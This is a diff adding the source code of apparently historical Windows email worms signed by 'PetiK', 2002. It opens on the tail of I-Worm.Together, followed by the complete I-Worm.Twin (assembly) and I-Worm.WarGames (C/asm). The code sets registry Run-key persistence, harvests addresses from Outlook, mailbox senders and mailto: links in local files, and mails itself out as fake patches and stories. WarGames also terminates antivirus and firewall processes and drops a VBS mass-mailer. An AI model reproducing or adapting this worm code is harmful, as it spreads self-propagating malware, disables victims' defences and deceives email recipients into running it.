+	db 'Set ou=CreateObject("Outlook.Application")',CRLF
+	db 'Set map=ou.GetNameSpace("MAPI")',CRLF
+	db 'adr=""',CRLF
+	db 'For Each mel in map.AddressLists',CRLF
+	db 'If mel.AddressEntries.Count <> 0 Then',CRLF
+	db 'For O=1 To mel.AddressEntries.Count',CRLF
+	db 'adr=adr &";"& mel.AddressEntries(O).Address',CRLF
+	db 'Next',CRLF
+	db 'End If',CRLF
+	db 'Next',CRLF
+	db 'adr=adr &";#"',CRLF,CRLF
+	db 'Set c=fs.OpenTextFile(sys&"\together.ini",2)',CRLF
+	db 'c.WriteLine adr',CRLF
+	db 'c.Close',CRLF
+e_vbs:
+
+
+
+signature	db "I-Worm.Together "
+author		db "Coded by PetiK - 2002",00h
+
+end start_worm
+end

Win32/I-Worm.Twin.asm

@@ -0,0 +1,198 @@
+comment #
+Name : I-Worm.Twin
+Author : PetiK
+Date : January 30th 2002 - February 1st 2002
+Size : 6656 bytes
+
+Action : See yourself. It's not complex.
+#
+
+.586p
+.model flat
+.code
+
+JUMPS
+
+api macro a
+extrn a:proc
+call a
+endm
+
+include useful.inc
+include myinclude.inc
+
+start:	push	50
+	mov	esi,offset orig_worm
+	push	esi
+	push	0
+	api	GetModuleFileNameA
+
+	push	25
+	push	esi
+	push	1
+	@pushsz	"AntiVirus Freeware"
+	@pushsz	"Software\Microsoft\Windows\CurrentVersion\Run"
+	push	80000002h
+	api	SHSetValueA
+
+	@pushsz "C:\twin.vbs"
+	api	DeleteFileA
+
+	push	50
+	push	offset pathname
+	api	GetWindowsDirectoryA
+	@pushsz	"\NetInfo.doc"
+	push	offset pathname
+	api	lstrcat
+
+verif_inet:
+	push	0
+	push	offset inet
+	api	InternetGetConnectedState
+	dec	eax
+	jnz	verif_inet
+
+	push	0
+	push	0
+	push	3
+	push	0
+	push	1
+	push	80000000h
+	@pushsz	"C:\backup.win"
+	api	CreateFileA
+	inc	eax
+	je	end_worm
+	dec	eax
+	xchg	ebx,eax
+
+	push	0
+	push	0
+	push	0
+	push	2
+	push	0
+	push	ebx
+	api	CreateFileMappingA
+	test	eax,eax
+	je	end_w1
+	xchg	eax,ebp
+
+	push	0
+	push	0
+	push	0
+	push	4
+	push	ebp
+	api	MapViewOfFile
+	test	eax,eax
+	je	end_w2
+	xchg	eax,esi
+
+	push	0
+	push	ebx
+	api	GetFileSize
+	cmp	eax,3
+	jbe	end_w3
+
+scan_mail:
+	xor	edx,edx
+	mov	edi,offset mail_addr
+	push	edi
+	p_c:	lodsb
+	cmp	al," "
+	je	car_s
+	cmp	al,0dh
+	je	entr1
+	cmp	al,0ah
+	je	entr2
+	cmp	al,"#"
+	je	f_mail
+	cmp	al,'@'
+	jne	not_a
+	inc	edx
+	not_a:	stosb
+		jmp p_c
+	car_s:	inc esi
+		jmp p_c
+	entr1:	xor al,al
+		stosb
+		pop edi
+		test edx,edx
+		je  scan_mail
+		call send_mail
+		jmp scan_mail
+	entr2:	xor al,al
+		stosb
+		pop edi
+		jmp scan_mail
+	f_mail:
+
+end_w3:	push	esi
+	api	UnmapViewOfFile
+end_w2:	push	ebp
+	api	CloseHandle
+end_w1:	push	ebx
+	api	CloseHandle
+
+
+end_worm:
+	push	0
+	api	ExitProcess
+
+send_mail:
+	xor	eax,eax
+	push	eax
+	push	eax
+	push	offset Message
+	push	eax
+	push	[sess]
+	api	MAPISendMail
+	ret
+
+.data
+orig_worm	db 50 dup (0)
+pathname	db 50 dup (0)
+mail_addr	db 128 dup (?)
+inet		dd 0
+sess		dd 0
+
+subject		db "A comical story for you.",0
+body		db "I send you a comical story found on the Net.",0dh,0ah,0dh,0ah
+		db 9,"Best Regards. You friend.",0
+filename	db "comical_story.doc",0
+
+Message		dd ?
+		dd offset subject
+		dd offset body
+		dd ?
+		dd ?
+		dd ?
+		dd 2
+		dd offset MsgFrom
+		dd 1
+		dd offset MsgTo
+		dd 1
+		dd offset Attach
+
+MsgFrom		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+		dd ?
+
+MsgTo		dd ?
+		dd 1
+		dd offset mail_addr
+		dd offset mail_addr
+		dd ?
+		dd ?
+
+Attach		dd ?
+		dd ?
+		dd ?
+		dd offset pathname
+		dd offset filename
+		dd ?
+
+
+end start
+end

Win32/I-Worm.WarGames.c

@@ -0,0 +1,379 @@
+/*
+Name : I-Worm.WarGames
+Author : PetiK
+Date : February 12th 2002 - February 22th 2002
+Language : C++/Win32asm
+*/
+
+#include <stdio.h>
+#include <windows.h>
+#include <mapi.h>
+#include <tlhelp32.h>
+#pragma argused
+#pragma inline
+
+char 	filename[100],sysdir[100],copyr[50]="w",winhtm[100],subj[50];
+int	num,counter=0;
+char	*alph[]={"a","b","c","d","e","f","g","h","i","j","k","l","m",
+		 "n","o","p","q","r","s","t","u","v","w","x","y","z"};
+char	dn[20]="Wargames Uninstall",ust[40]="rundll32 mouse,disable";
+LPSTR 	SHFolder=".DEFAULT\\Software\\Microsoft\\Windows\\CurrentVersion\\Explorer\\Shell Folders";
+BYTE	desktop[50],favoris[50],personal[50],cache[50],page[150];
+DWORD	sizcache=sizeof(desktop),sizfavoris=sizeof(favoris),
+	sizpersonal=sizeof(personal),sizdesktop=sizeof(cache),spage=sizeof(page);
+DWORD	type=REG_SZ;
+FILE	*vbsworm,*winstart;
+HANDLE	lSnapshot,myproc;
+BOOL	rProcessFound;
+
+LHANDLE session;
+MapiMessage mess;
+MapiMessage *mes;
+MapiRecipDesc from;
+char messId[512],mname[50],maddr[30];
+HINSTANCE hMAPI;
+
+WIN32_FIND_DATA		ffile;
+PROCESSENTRY32 		uProcess;
+HKEY			hReg;
+SYSTEMTIME		wartime;
+
+void StopAV(char *);
+void FindFile(char *,char *);
+void GetMail(char *,char *);
+void sendmail(char *);
+
+ULONG (PASCAL FAR *mSendMail)(ULONG, ULONG, MapiMessage*, FLAGS, ULONG);
+ULONG (PASCAL FAR *mLogoff)(LHANDLE, ULONG, FLAGS, ULONG);
+ULONG (PASCAL FAR *mLogon)(ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPLHANDLE);
+ULONG (PASCAL FAR *mFindNext)(LHANDLE, ULONG, LPTSTR, LPTSTR, FLAGS, ULONG, LPTSTR);
+ULONG (PASCAL FAR *mReadMail)(LHANDLE, ULONG, LPTSTR, FLAGS, ULONG, lpMapiMessage FAR *);
+ULONG (PASCAL FAR *mFreeBuffer)(LPVOID);
+
+int WINAPI WinMain (HINSTANCE hInst, HINSTANCE hPrev, LPSTR lpCmd, int nShow)
+{
+// Kill Some AntiVirus
+StopAV("AVP32.EXE");		// AVP
+StopAV("AVPCC.EXE");		// AVP
+StopAV("AVPM.EXE");		// AVP
+StopAV("WFINDV32.EXE");		// Dr. Solomon
+StopAV("F-AGNT95.EXE");		// F-Secure
+StopAV("NAVAPW32.EXE");		// Norton Antivirus
+StopAV("NAVW32.EXE");		// Norton Antivirus
+StopAV("NMAIN.EXE");		// Norton Antivirus
+StopAV("PAVSCHED.EXE");		// Panda AntiVirus
+StopAV("ZONEALARM.EXE");	// ZoneAlarm
+
+// Kill Some Worm
+StopAV("KERN32.EXE");		// I-Worm.Badtrans
+StopAV("SETUP.EXE");		// I-Worm.Cholera
+StopAV("RUNDLLW32.EXE");	// I-Worm.Gift
+StopAV("GONER.SCR");		// I-Worm.Goner
+StopAV("LOAD.EXE");		// I-Worm.Nimda
+StopAV("INETD.EXE");		// I-Worm.Plage - BadTrans
+StopAV("FILES32.VXD");		// I-Worm.PrettyPark
+StopAV("SCAM32.EXE");		// I-Worm.Sircam
+StopAV("GDI32.EXE");		// I-Worm.Sonic
+StopAV("_SETUP.EXE");		// I-Worm.ZippedFiles
+StopAV("EXPLORE.EXE");		// I-Worm.ZippedFiles
+StopAV("ZIPPED_FILES.EXE");	// I-Worm.ZippedFiles
+
+GetModuleFileName(hInst,filename,100);
+GetSystemDirectory((char *)sysdir,100);
+SetCurrentDirectory(sysdir);
+CopyFile(filename,"article.doc.exe",TRUE);
+RegCreateKey(HKEY_LOCAL_MACHINE,"Software\\Microsoft\\Windows\\CurrentVersion\\Uninstall\\WarGames Worm",&hReg);
+RegSetValueEx(hReg,"DisplayName",0,REG_SZ,(BYTE *)dn,20);
+RegSetValueEx(hReg,"UninstallString",0,REG_SZ,(BYTE *)ust,40);
+RegCloseKey(hReg);
+
+randomize();
+num=rand() % 10;
+randname:
+strcat(copyr,alph[GetTickCount()%25]);
+if(++counter==num) {
+	strcat(copyr,".exe");
+	MessageBox(NULL,copyr,"New Copy Name:",MB_OK|MB_ICONINFORMATION);
+	CopyFile(filename,copyr,FALSE);
+	WriteProfileString("WINDOWS","RUN",copyr);
+	WritePrivateProfileString("rename","NUL",filename,"WININIT.INI");
+	goto endrandname;
+	}
+Sleep(GetTickCount()%100);
+goto randname;
+endrandname:
+
+hMAPI=LoadLibrary("MAPI32.DLL");
+(FARPROC &)mSendMail=GetProcAddress(hMAPI, "MAPISendMail");
+RegOpenKeyEx(HKEY_USERS,SHFolder,0,KEY_QUERY_VALUE,&hReg);
+RegQueryValueEx(hReg,"Desktop",0,&type,desktop,&sizdesktop);
+RegQueryValueEx(hReg,"Favorites",0,&type,favoris,&sizfavoris);
+RegQueryValueEx(hReg,"Personal",0,&type,personal,&sizpersonal);
+RegQueryValueEx(hReg,"Cache",0,&type,cache,&sizcache);
+RegCloseKey(hReg);
+GetWindowsDirectory((char *)winhtm,100);
+
+_asm
+{
+call	@wininet
+db	"WININET.DLL",0
+@wininet:
+call	LoadLibrary
+test	eax,eax
+jz	end_asm
+mov	ebp,eax
+call	@inetconnect
+db	"InternetGetConnectedState",0
+@inetconnect:
+push	ebp
+call	GetProcAddress
+test	eax,eax
+jz	end_wininet
+mov	edi,eax
+verf:
+push	0
+push	Tmp
+call	edi
+dec	eax
+jnz	verf
+
+end_wininet:
+push	ebp
+call	FreeLibrary
+end_asm:
+jmp	end_all_asm
+
+Tmp	dd 0
+
+end_all_asm:
+}
+
+FindFile(desktop,"*.htm");
+FindFile(desktop,"*.doc");
+FindFile(favoris,"*.ht*");
+FindFile(personal,"*.ht*");
+FindFile(personal,"*.doc");
+FindFile(personal,"*.xls");
+FindFile(personal,"*.asp");
+FindFile(cache,".ht*");
+FindFile(cache,".php");
+FindFile(cache,".asp");
+FindFile(winhtm,".ht*");
+FindFile(winhtm,".doc");
+
+
+vbsworm=fopen("wargames.vbs","w");
+fprintf(vbsworm,"On Error Resume Next\n");
+fprintf(vbsworm,"msgbox %cScripting.FileSystemObject%c\n",34,34);
+fprintf(vbsworm,"Set sf=CreateObject(%cScripting.FileSystemObject%c)\n",34,34);
+fprintf(vbsworm,"Set sys=sf.GetSpecialFolder(1)\n");
+fprintf(vbsworm,"Set OA=CreateObject(%cOutlook.Application%c)\n",34,34);
+fprintf(vbsworm,"Set MA=OA.GetNameSpace(%cMAPI%c)\n",34,34);
+fprintf(vbsworm,"For Each C In MA.AddressLists\n");
+fprintf(vbsworm,"If C.AddressEntries.Count <> 0 Then\n");
+fprintf(vbsworm,"For D=1 To C.AddressEntries.Count\n");
+fprintf(vbsworm,"Set AD=C.AddressEntries(D)\n");
+fprintf(vbsworm,"Set EM=OA.CreateItem(0)\n");
+fprintf(vbsworm,"EM.To=AD.Address\n");
+fprintf(vbsworm,"EM.Subject=%cHi %c&AD.Name&%c read this.%c\n",34,34,34,34);
+fprintf(vbsworm,"body=%cI found this on the web and it is important.%c\n",34,34);
+fprintf(vbsworm,"body = body & VbCrLf & %cOpen the attached file and read.%c\n",34,34);
+fprintf(vbsworm,"EM.Body=body\n");
+fprintf(vbsworm,"EM.Attachments.Add(sys&%c\\article.doc.exe%c)\n",34,34);
+fprintf(vbsworm,"EM.DeleteAfterSubmit=True\n");
+fprintf(vbsworm,"If EM.To <> %c%c Then\n",34,34);
+fprintf(vbsworm,"EM.Send\n");
+fprintf(vbsworm,"End If\n");
+fprintf(vbsworm,"Next\n");
+fprintf(vbsworm,"End If\n");
+fprintf(vbsworm,"Next\n");
+fclose(vbsworm);
+ShellExecute(NULL,"open","wargames.vbs",NULL,NULL,SW_SHOWNORMAL);
+Sleep(5000);
+DeleteFile("wargames.vbs");
+
+(FARPROC &)mLogon=GetProcAddress(hMAPI, "MAPILogon");
+(FARPROC &)mLogoff=GetProcAddress(hMAPI, "MAPILogoff");
+(FARPROC &)mFindNext=GetProcAddress(hMAPI, "MAPIFindNext");
+(FARPROC &)mReadMail=GetProcAddress(hMAPI, "MAPIReadMail");
+(FARPROC &)mFreeBuffer=GetProcAddress(hMAPI, "MAPIFreeBuffer");
+mLogon(NULL,NULL,NULL,MAPI_NEW_SESSION,NULL,&session);
+if(mFindNext(session,0,NULL,NULL,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS) {
+  do {
+     if(mReadMail(session,NULL,messId,MAPI_ENVELOPE_ONLY|MAPI_PEEK,NULL,&mes)==SUCCESS_SUCCESS) {
+	strcpy(mname,mes->lpOriginator->lpszName);
+	strcpy(maddr,mes->lpOriginator->lpszAddress);
+	mes->ulReserved=0;
+	mes->lpszSubject="Re: Fw:";
+	mes->lpszNoteText="I received your mail but I cannot reply immediatly.\n"
+				"I send you a nice program. Look at this.\n\n"
+				"	See you soon.";
+	mes->lpszMessageType=NULL;
+	mes->lpszDateReceived=NULL;
+	mes->lpszConversationID=NULL;
+	mes->flFlags=MAPI_SENT;
+	mes->lpOriginator->ulReserved=0;
+	mes->lpOriginator->ulRecipClass=MAPI_ORIG;
+	mes->lpOriginator->lpszName=mes->lpRecips->lpszName;
+	mes->lpOriginator->lpszAddress=mes->lpRecips->lpszAddress;
+	mes->nRecipCount=1;
+	mes->lpRecips->ulReserved=0;
+	mes->lpRecips->ulRecipClass=MAPI_TO;
+	mes->lpRecips->lpszName=mname;
+	mes->lpRecips->lpszAddress=maddr;
+	mes->nFileCount=1;
+	mes->lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
+	memset(mes->lpFiles, 0, sizeof(MapiFileDesc));
+	mes->lpFiles->ulReserved=0;
+	mes->lpFiles->flFlags=NULL;
+	mes->lpFiles->nPosition=-1;
+	mes->lpFiles->lpszPathName=filename;
+	mes->lpFiles->lpszFileName="funny.exe";
+	mes->lpFiles->lpFileType=NULL;
+	mSendMail(session, NULL, mes, NULL, NULL);
+	}
+  }while(mFindNext(session,0,NULL,messId,MAPI_LONG_MSGID,NULL,messId)==SUCCESS_SUCCESS);
+free(mes->lpFiles);
+mFreeBuffer(mes);
+mLogoff(session,0,0,0);
+FreeLibrary(hMAPI);
+}
+
+
+}
+
+void FindFile(char *folder, char *ext)
+{
+register bool abc=TRUE;
+register HANDLE hFile;
+char mail[128];
+SetCurrentDirectory(folder);
+hFile=FindFirstFile(ext,&ffile);
+if(hFile!=INVALID_HANDLE_VALUE) {
+	while(abc) {
+	SetFileAttributes(ffile.cFileName,FILE_ATTRIBUTE_ARCHIVE);
+	GetMail(ffile.cFileName,mail);
+	if(strlen(mail)>0) {
+	sendmail(mail);
+	}
+	abc=FindNextFile(hFile,&ffile);
+	}
+}
+
+}
+
+void GetMail(char *namefile, char *mail)
+{
+HANDLE	hf,hf2;
+char	*mapped;
+DWORD	size,i,k;
+BOOL	test=FALSE,valid=FALSE;
+mail[0]=0;
+
+hf=CreateFile(namefile,GENERIC_READ,FILE_SHARE_READ,0,OPEN_EXISTING,FILE_ATTRIBUTE_ARCHIVE,0);
+if(hf==INVALID_HANDLE_VALUE)
+	return;
+size=GetFileSize(hf,NULL);
+if(!size)
+	return;
+if(size<8)
+	return;
+size-=100;
+
+hf2=CreateFileMapping(hf,0,PAGE_READONLY,0,0,0);
+if(!hf2) {
+	CloseHandle(hf);
+	return;
+	}
+
+mapped=(char *)MapViewOfFile(hf2,FILE_MAP_READ,0,0,0);
+if(!mapped) {
+	CloseHandle(hf2);
+	CloseHandle(hf);
+	return;
+	}
+
+i=0;
+while(i<size && !test) {
+if(!strncmpi("mailto:",mapped+i,strlen("mailto:"))) {
+	test=TRUE;
+	i+=strlen("mailto:");
+	k=0;
+	while(mapped[i]!=34 && mapped[i]!=39 && i<size && k<127) {
+		if(mapped[i]!=' ') {
+			mail[k]=mapped[i];
+			k++;
+			if(mapped[i]=='@')
+				valid=TRUE;
+		}
+		i++;
+	}
+	mail[k]=0;
+	} else
+	i++;
+}
+
+if(!valid)
+	mail[0]=0;
+UnmapViewOfFile(mapped);
+CloseHandle(hf2);
+CloseHandle(hf);
+return;
+}
+
+void sendmail(char *tos)
+{
+memset(&mess,0,sizeof(MapiMessage));
+memset(&from,0,sizeof(MapiRecipDesc));
+wsprintf(subj,"Mail to %s.",tos);
+
+from.lpszName=NULL;
+from.ulRecipClass=MAPI_ORIG;
+mess.lpszSubject=subj;
+mess.lpszNoteText="I send you this patch.\n"
+		"It corrects a bug into Internet Explorer and Outlook.\n\n"
+		"	Have a nice day. Best Regards.";
+
+mess.lpRecips=(MapiRecipDesc *)malloc(sizeof(MapiRecipDesc));
+	if(!mess.lpRecips)
+	return;
+memset(mess.lpRecips,0,sizeof(MapiRecipDesc));
+mess.lpRecips->lpszName=tos;
+mess.lpRecips->lpszAddress=tos;
+mess.lpRecips->ulRecipClass=MAPI_TO;
+mess.nRecipCount=1;
+
+mess.lpFiles=(MapiFileDesc *)malloc(sizeof(MapiFileDesc));
+	if(!mess.lpFiles)
+	return;
+memset(mess.lpFiles,0,sizeof(MapiFileDesc));
+mess.lpFiles->lpszPathName=filename;
+mess.lpFiles->lpszFileName="patch.exe";
+mess.nFileCount=1;
+
+mess.lpOriginator=&from;
+
+mSendMail(0,0,&mess,0,0);
+
+free(mess.lpRecips);
+free(mess.lpFiles);
+}
+
+void StopAV(char *antivirus)
+{
+register BOOL term;
+lSnapshot=CreateToolhelp32Snapshot(TH32CS_SNAPPROCESS,0);
+uProcess.dwSize=sizeof(uProcess);
+rProcessFound=Process32First(lSnapshot,&uProcess);
+while(rProcessFound) {
+	if(strstr(uProcess.szExeFile,antivirus)!=NULL) {
+		myproc=OpenProcess(PROCESS_ALL_ACCESS,FALSE,uProcess.th32ProcessID);
+		if(myproc!=NULL) {
+			term=TerminateProcess(myproc,0);
+		}
+		CloseHandle(myproc);
+	}
+	rProcessFound=Process32Next(lSnapshot,&uProcess);
+}
+CloseHandle(lSnapshot);
+}